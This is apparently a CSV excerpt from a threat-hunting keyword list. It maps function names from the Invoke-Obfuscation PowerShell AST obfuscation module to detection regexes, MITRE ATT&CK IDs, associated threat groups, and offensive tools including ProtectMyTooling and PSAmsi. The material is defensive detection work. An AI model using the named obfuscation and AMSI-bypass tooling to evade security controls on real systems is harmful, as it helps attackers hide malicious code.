"*Out-ObfuscatedArrayLiteralAst *",".{0,1000}Out\-ObfuscatedArrayLiteralAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54073"
"*Out-ObfuscatedArrayLiteralAst *",".{0,1000}Out\-ObfuscatedArrayLiteralAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54074"
"*Out-ObfuscatedAssignmentStatementAst *",".{0,1000}Out\-ObfuscatedAssignmentStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54075"
"*Out-ObfuscatedAssignmentStatementAst *",".{0,1000}Out\-ObfuscatedAssignmentStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54076"
"*Out-ObfuscatedAst.ps1*",".{0,1000}Out\-ObfuscatedAst\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54077"
"*Out-ObfuscatedAst.ps1*",".{0,1000}Out\-ObfuscatedAst\.ps1.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54078"
"*Out-ObfuscatedAst.ps1*",".{0,1000}Out\-ObfuscatedAst\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","54079"
"*Out-ObfuscatedAstsReordered *",".{0,1000}Out\-ObfuscatedAstsReordered\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54080"
"*Out-ObfuscatedAstsReordered *",".{0,1000}Out\-ObfuscatedAstsReordered\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54081"
"*Out-ObfuscatedAttributeAst *",".{0,1000}Out\-ObfuscatedAttributeAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54082"
"*Out-ObfuscatedAttributeAst *",".{0,1000}Out\-ObfuscatedAttributeAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54083"
"*Out-ObfuscatedAttributeBaseAst *",".{0,1000}Out\-ObfuscatedAttributeBaseAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54084"
"*Out-ObfuscatedAttributeBaseAst *",".{0,1000}Out\-ObfuscatedAttributeBaseAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54085"
"*Out-ObfuscatedAttributedExpressionAst *",".{0,1000}Out\-ObfuscatedAttributedExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54086"
"*Out-ObfuscatedAttributedExpressionAst *",".{0,1000}Out\-ObfuscatedAttributedExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54087"
"*Out-ObfuscatedBaseCtorInvokeMemberExpressionAst *",".{0,1000}Out\-ObfuscatedBaseCtorInvokeMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54088"
"*Out-ObfuscatedBaseCtorInvokeMemberExpressionAst *",".{0,1000}Out\-ObfuscatedBaseCtorInvokeMemberExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54089"
"*Out-ObfuscatedBinaryExpressionAst *",".{0,1000}Out\-ObfuscatedBinaryExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54090"
"*Out-ObfuscatedBinaryExpressionAst *",".{0,1000}Out\-ObfuscatedBinaryExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54091"
"*Out-ObfuscatedBlockStatementAst *",".{0,1000}Out\-ObfuscatedBlockStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54092"
"*Out-ObfuscatedBlockStatementAst *",".{0,1000}Out\-ObfuscatedBlockStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54093"
"*Out-ObfuscatedBreakStatementAst *",".{0,1000}Out\-ObfuscatedBreakStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54094"
"*Out-ObfuscatedBreakStatementAst *",".{0,1000}Out\-ObfuscatedBreakStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54095"
"*Out-ObfuscatedCatchClauseAst *",".{0,1000}Out\-ObfuscatedCatchClauseAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54096"
"*Out-ObfuscatedCatchClauseAst *",".{0,1000}Out\-ObfuscatedCatchClauseAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54097"
"*Out-ObfuscatedChildrenAst *",".{0,1000}Out\-ObfuscatedChildrenAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54098"
"*Out-ObfuscatedChildrenAst *",".{0,1000}Out\-ObfuscatedChildrenAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54099"
"*Out-ObfuscatedCommandAst *",".{0,1000}Out\-ObfuscatedCommandAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54100"
"*Out-ObfuscatedCommandAst *",".{0,1000}Out\-ObfuscatedCommandAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54101"
"*Out-ObfuscatedCommandBaseAst *",".{0,1000}Out\-ObfuscatedCommandBaseAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54102"
"*Out-ObfuscatedCommandBaseAst *",".{0,1000}Out\-ObfuscatedCommandBaseAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54103"
"*Out-ObfuscatedCommandElementAst *",".{0,1000}Out\-ObfuscatedCommandElementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54104"
"*Out-ObfuscatedCommandElementAst *",".{0,1000}Out\-ObfuscatedCommandElementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54105"
"*Out-ObfuscatedCommandExpressionAst *",".{0,1000}Out\-ObfuscatedCommandExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54106"
"*Out-ObfuscatedCommandExpressionAst *",".{0,1000}Out\-ObfuscatedCommandExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54107"
"*Out-ObfuscatedCommandParameterAst *",".{0,1000}Out\-ObfuscatedCommandParameterAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54108"
"*Out-ObfuscatedCommandParameterAst *",".{0,1000}Out\-ObfuscatedCommandParameterAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54109"
"*Out-ObfuscatedConfigurationDefinitionAst *",".{0,1000}Out\-ObfuscatedConfigurationDefinitionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54110"
"*Out-ObfuscatedConfigurationDefinitionAst *",".{0,1000}Out\-ObfuscatedConfigurationDefinitionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54111"
"*Out-ObfuscatedConstantExpressionAst *",".{0,1000}Out\-ObfuscatedConstantExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54112"
"*Out-ObfuscatedConstantExpressionAst *",".{0,1000}Out\-ObfuscatedConstantExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54113"
"*Out-ObfuscatedContinueStatementAst *",".{0,1000}Out\-ObfuscatedContinueStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54114"
"*Out-ObfuscatedContinueStatementAst *",".{0,1000}Out\-ObfuscatedContinueStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54115"
"*Out-ObfuscatedConvertExpressionAst *",".{0,1000}Out\-ObfuscatedConvertExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54116"
"*Out-ObfuscatedConvertExpressionAst *",".{0,1000}Out\-ObfuscatedConvertExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54117"
"*Out-ObfuscatedDataStatementAst *",".{0,1000}Out\-ObfuscatedDataStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54118"
"*Out-ObfuscatedDataStatementAst *",".{0,1000}Out\-ObfuscatedDataStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54119"
"*Out-ObfuscatedDoUntilStatementAst *",".{0,1000}Out\-ObfuscatedDoUntilStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54120"
"*Out-ObfuscatedDoUntilStatementAst *",".{0,1000}Out\-ObfuscatedDoUntilStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54121"
"*Out-ObfuscatedDoWhileStatementAst *",".{0,1000}Out\-ObfuscatedDoWhileStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54122"
"*Out-ObfuscatedDoWhileStatementAst *",".{0,1000}Out\-ObfuscatedDoWhileStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54123"
"*Out-ObfuscatedDynamicKeywordStatementAst *",".{0,1000}Out\-ObfuscatedDynamicKeywordStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54124"
"*Out-ObfuscatedDynamicKeywordStatementAst *",".{0,1000}Out\-ObfuscatedDynamicKeywordStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54125"
"*Out-ObfuscatedErrorExpressionAst *",".{0,1000}Out\-ObfuscatedErrorExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54126"
"*Out-ObfuscatedErrorExpressionAst *",".{0,1000}Out\-ObfuscatedErrorExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54127"
"*Out-ObfuscatedErrorStatementAst *",".{0,1000}Out\-ObfuscatedErrorStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54128"
"*Out-ObfuscatedErrorStatementAst *",".{0,1000}Out\-ObfuscatedErrorStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54129"
"*Out-ObfuscatedExitStatementAst *",".{0,1000}Out\-ObfuscatedExitStatementAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54130"
"*Out-ObfuscatedExitStatementAst *",".{0,1000}Out\-ObfuscatedExitStatementAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54131"
"*Out-ObfuscatedExpandableStringExpressionAst *",".{0,1000}Out\-ObfuscatedExpandableStringExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54132"
"*Out-ObfuscatedExpandableStringExpressionAst *",".{0,1000}Out\-ObfuscatedExpandableStringExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54133"
